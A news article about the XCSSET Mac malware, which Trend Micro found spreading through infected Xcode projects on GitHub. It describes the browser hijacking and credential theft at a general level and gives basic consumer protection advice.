Cybercriminals are corrupting Mac applications from source and contaminating benign open source projects with malware

Running infected applications can direct users to dangerous websites, change the addresses of cryptocurrency wallets, take screenshots while browsing, and steal credit cards

The malware also replaces Safari with a malicious version of Apple's browser, infects all other major browsers, steals usernames and passwords for Google, Apple ID, PayPal, Skype, Telegram, Evernote, WeChat, or install ransomware

To protect yourself, make sure you are running the best Mac antivirus software Also, for the time being, only install apps from Apple's App Store

Trend Micro, the antivirus maker that discovered the malware, called it a "rabbit hole of malicious payloads" in a blog post last week

The malware, which Trend Micro calls XCSSET, once complete, profiles the system and infects any version of Brave, Firefox, Opera, 360, and Yandex browsers that may be installed If Google Chrome is installed, this malware replaces it with an older version of Chrome with weaker security

However, this is nothing compared to what is done in Safari The malware downloads and installs a malicious version of Safari so that internal links to the real Safari jump to the fake Safari

"Functionally, this means that a fake Safari browser runs instead of the legitimate version of Safari," states a Trend Micro white paper on the XCSSET malware

So far, Trend Micro has confirmed that XCSSET has infected two Mac open source projects; infection of iOS apps has not been confirmed

If this sounds familiar, something similar has happened before: in 2015, a malicious version of Apple's development platform Xcode was distributed in China As a result, Mac and iOS apps created with the corrupted version of Xcode became corrupted themselves Apple promptly removed the tainted apps from its app store

So why is it happening again? This time, the scammers are attacking a bit more downstream: instead of attacking Xcode itself, they are checking online code repositories such as GitHub

"Malicious code is injected into a local Xcode project, and when the project is built, the malicious code is executed," Trend Micro said

Unaware software developers release applications with their own legitimate signatures, so infected applications are not always stopped by Apple's own built-in security safeguards

"Methods to verify distributed files (such as checking for hashes) are not helpful because developers are not aware that they are distributing malicious files," Trend Micro added